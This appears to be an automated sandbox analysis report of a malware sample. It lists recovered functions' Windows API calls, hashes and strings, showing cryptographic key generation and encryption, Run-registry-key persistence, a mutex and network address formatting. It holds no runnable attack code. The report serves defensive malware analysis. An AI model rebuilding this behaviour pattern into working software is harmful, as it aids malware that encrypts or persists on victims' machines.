                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: GetLastError.KERNEL32 ref: 013F8ADD
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F8B0C
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 013F8B37
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 013F8B5E
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 013F8B7A
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 013F8B87
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 013F8B91
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F8B9D
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 013F7A4B
                                                                                                                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 013F7A90
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 013F7ABC
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                          • String ID: %s:%u$Balucergobw
                                                                                                                                                                                                                                                          • API String ID: 1891311255-1217149509
                                                                                                                                                                                                                                                          • Opcode ID: 74196b0fea9d4e1f25884c5e476dce35b566729fc15ceb035c09e689315da2dd
                                                                                                                                                                                                                                                          • Instruction ID: ab84b57610047ff84e1e0fc0309021abbae609ca2db736b5baceb21b310cb8b6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74196b0fea9d4e1f25884c5e476dce35b566729fc15ceb035c09e689315da2dd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E412CB1E40209ABEB04DBD8C985FEEBBB5EB48704F14805DE605BB384D7749A44CB64
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 013F5E7E
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 013F5EB2
                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,?), ref: 013F5ED6
                                                                                                                                                                                                                                                          • RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 013F5F0B
                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 013F5F19
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                          • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                          • Opcode ID: f70a90b3c7fe28d6edde7f8ea1eb964e456e26b445c71a685e5e9fc43eccc16a
                                                                                                                                                                                                                                                          • Instruction ID: be6022f87bdfd15493643b243e6840e5c262c00f749ffe976ad3359497dd7df0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f70a90b3c7fe28d6edde7f8ea1eb964e456e26b445c71a685e5e9fc43eccc16a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7316DB1A4020DABEB10CFD4C855FFFBBB9BB04708F14405CEA04A7281D7B59A01CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,005084BC,00000000,?,?,?,0050964F,?,?,00000100), ref: 00509458
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00509490
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0050964F,?,?,00000100,?,?,?), ref: 005094DE
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00509575
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000100,?,00000000,00000000,?,?,?,0050964F,?,?,00000100,?), ref: 005095D8
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 005095E5
                                                                                                                                                                                                                                                            • Part of subcall function 00509273: RtlAllocateHeap.NTDLL(00000000,?,?,?,0050815B,00000220), ref: 005092A5
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 005095EE
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00509613
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3864826663-0
                                                                                                                                                                                                                                                          • Opcode ID: bf13bd958c6cab519456cd601d2e1129542cc5dfa2cc1d6af86460538e8bda71
                                                                                                                                                                                                                                                          • Instruction ID: 1e21a4f59b397badb7635ded9aea6b0c53a6ec7aecfefee0036d2f424fdfe3b0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf13bd958c6cab519456cd601d2e1129542cc5dfa2cc1d6af86460538e8bda71
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4151C072A00216ABDB2A8E65CC45EBF7FA9FF84750F144629F805D61DAEB35DC40C690
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 013F4AD8
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 013F4AF4
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(-0000000C), ref: 013F4B08
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(-0000000C), ref: 013F4B44
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013F4B6B
                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 013F4B78
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 013F4B85
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 013F4B90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3462651527-0
                                                                                                                                                                                                                                                          • Opcode ID: f9fd762115ceb8eb0050192cb0cbee83c9b2a06a6358f6acd076025eb0c7ffca
                                                                                                                                                                                                                                                          • Instruction ID: 32086d57e716664e9c54f4a2b464f478719e87da2575a57517b29e081ea944cd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9fd762115ceb8eb0050192cb0cbee83c9b2a06a6358f6acd076025eb0c7ffca
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41213A74A4020CEFDB14DBA8D958FAEB7B9EB48305F10858CE605A7285D735EE45CB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 013F77C2
                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(00001388,00000000), ref: 013F780E
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 013F7826
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00001388), ref: 013F7835
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 013F7840
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 013F78A5
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 013F78BD
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2326833528-0
                                                                                                                                                                                                                                                          • Opcode ID: a11481b776e95c972ec3fc1fe2b19cff12d411493ad3e2e7f1c2bcac3cead3a1
                                                                                                                                                                                                                                                          • Instruction ID: 5a59d642ee80d40467f7d21c0043bc9dcae09d5dadd1c05d2d8024a343533d0d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a11481b776e95c972ec3fc1fe2b19cff12d411493ad3e2e7f1c2bcac3cead3a1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15316B74A00209EFEB10CFA8D949FAEBBB5FB48309F10855CE605A7380D7719E45CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F5CEB
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013F5D10
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 013F5D29
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F5D45
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 013F5D6D
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013F5D99
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 013F5DA3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 443218420-0
                                                                                                                                                                                                                                                          • Opcode ID: 6f848b5958168ad0973f7a242fd68cd413aa69d87f53d1c3a9689fbd6234fd2d
                                                                                                                                                                                                                                                          • Instruction ID: 9a596b97919cda7908b74a15044bc19d9035ccfda1a9d25b678288985fe117e4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f848b5958168ad0973f7a242fd68cd413aa69d87f53d1c3a9689fbd6234fd2d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53212C75E40209FFEB20DFA8D849FAEBB78AB08705F10854CF615A72C4C7749A45CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,00000000), ref: 013F1337
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 013F1345
                                                                                                                                                                                                                                                          • RegSetValueExA.KERNEL32(00000000,-00000208,00000000,00000001,?,?), ref: 013F1368
                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 013F1372
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 013F137D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                          • String ID: software\microsoft\windows\currentversion\run
                                                                                                                                                                                                                                                          • API String ID: 3411147897-1396020897
                                                                                                                                                                                                                                                          • Opcode ID: f427fcfbbf6746d6991eb453089f178a33bf7797e1fa33bbbb4d3889c35b050c
                                                                                                                                                                                                                                                          • Instruction ID: f65f92d02361e01793bf7e283274c1dd13fc5f797c81fc41ea7a600a4f2d4e20
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f427fcfbbf6746d6991eb453089f178a33bf7797e1fa33bbbb4d3889c35b050c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E214C71A40209EFDB14CFE9D948FAEBBB8FB05304F10415DE601A7281D7709A41CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F5B7F
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F5B8C
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 013F5BB6
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F5BF6
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 013F5C2A
                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 013F5C59
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F5C9E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 808621155-0
                                                                                                                                                                                                                                                          • Opcode ID: 35c6a9dfadc1a8f6eb7915fbd8573e1449ef608b3e70d9a032a0bf9f408c8333
                                                                                                                                                                                                                                                          • Instruction ID: d1bb70c33b7e43d2eb15f81c514ccf739b194ad32af6d98699b43528ef745713
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35c6a9dfadc1a8f6eb7915fbd8573e1449ef608b3e70d9a032a0bf9f408c8333
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A51C67490020DEFDF04CF98C598BEEBBB5AF48309F148559E606A7384C375AA45CFA5
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,01403B88,00000000,000F003F,00000000), ref: 013F6D30
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,01403FA6,00000000,00000003,?,00000020), ref: 013F6D61
                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,01403FA6), ref: 013F6D7E
                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 013F6D88
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: 0ef6f8f585fb2f03a1267f8d93a968e01ff3c9ccac502dc6f40863ff88d37b96
                                                                                                                                                                                                                                                          • Instruction ID: e2fcabb01adfad03900ed829a4438671595809aa81035b9c0080563387d8af66
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef6f8f585fb2f03a1267f8d93a968e01ff3c9ccac502dc6f40863ff88d37b96
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F1148B5A40209AFDB11DFE4D849BBEBBB8BB08704F14818CF600A7285D7B59645CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 013F83BF
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 013F83D6
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F846B
                                                                                                                                                                                                                                                            • Part of subcall function 013F8970: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F89BF
                                                                                                                                                                                                                                                            • Part of subcall function 013F8970: GetLastError.KERNEL32 ref: 013F89C9
                                                                                                                                                                                                                                                            • Part of subcall function 013F8970: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F89F8
                                                                                                                                                                                                                                                            • Part of subcall function 013F8970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 013F8A1F
                                                                                                                                                                                                                                                            • Part of subcall function 013F8970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 013F8A41
                                                                                                                                                                                                                                                            • Part of subcall function 013F8970: CryptDestroyKey.ADVAPI32(00000000), ref: 013F8A4E
                                                                                                                                                                                                                                                            • Part of subcall function 013F8970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F8A5A
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013F858C
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013F85A3
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013F85BA
                                                                                                                                                                                                                                                            • Part of subcall function 013F8800: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,013F8420,00000000,00001000,00000000), ref: 013F883B
                                                                                                                                                                                                                                                            • Part of subcall function 013F8800: GetLastError.KERNEL32 ref: 013F8845
                                                                                                                                                                                                                                                            • Part of subcall function 013F8800: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F8874
                                                                                                                                                                                                                                                            • Part of subcall function 013F8800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 013F88AF
                                                                                                                                                                                                                                                            • Part of subcall function 013F8800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 013F88CF
                                                                                                                                                                                                                                                            • Part of subcall function 013F8800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 013F890C
                                                                                                                                                                                                                                                            • Part of subcall function 013F8800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 013F892A
                                                                                                                                                                                                                                                            • Part of subcall function 013F8800: CryptDestroyKey.ADVAPI32(?), ref: 013F8937
                                                                                                                                                                                                                                                            • Part of subcall function 013F87D0: QueryPerformanceCounter.KERNEL32(?), ref: 013F87E7
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 487564122-0
                                                                                                                                                                                                                                                          • Opcode ID: 9341038df432d43952541198fe2d6c8a16ec8b199c699af88436760cb658c270
                                                                                                                                                                                                                                                          • Instruction ID: 16327644b9a383269115dc641216198db5ef2cf2457f483ed29e3a72f81c80fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9341038df432d43952541198fe2d6c8a16ec8b199c699af88436760cb658c270
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD715FB5D00209EBEF18DFA8D845FEEB7B4AB48308F148159FB14A7284E770D648CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExitThread
                                                                                                                                                                                                                                                          • String ID: xnT$xnT
                                                                                                                                                                                                                                                          • API String ID: 2158977761-1598854230
                                                                                                                                                                                                                                                          • Opcode ID: 6126be10b1dc88521695068f7578daad6fd2bcd3bd41554f0b8f89fa369cf2e6
                                                                                                                                                                                                                                                          • Instruction ID: 5e532157d014989785e3faf1cb4087087228019e54ca64198ae9f62356672c34
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6126be10b1dc88521695068f7578daad6fd2bcd3bd41554f0b8f89fa369cf2e6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD311335200B06CFD720CF38C488BD6B7E5FB49354F40896AE49AD7261E730B989CB11
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32 ref: 0050771D
                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 0050773B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: String
                                                                                                                                                                                                                                                          • String ID: LCMapStringEx
                                                                                                                                                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                                                          • Opcode ID: 13ee5c77f4f8b5cada100490b4bf292e9a5428b359ae14fb9297d2ee69991677
                                                                                                                                                                                                                                                          • Instruction ID: 08b8452bd991eca3b150879b213deb08c697a08d1ced3edb990e5cd6ac0f382d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13ee5c77f4f8b5cada100490b4bf292e9a5428b359ae14fb9297d2ee69991677
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3401B03294521DBBCF129F909C0AEEE3F62FF4C7A0F454554BE14251A1C6729935EB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,013F3BEB), ref: 013F5E0C
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,013F3BEB), ref: 013F5E12
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
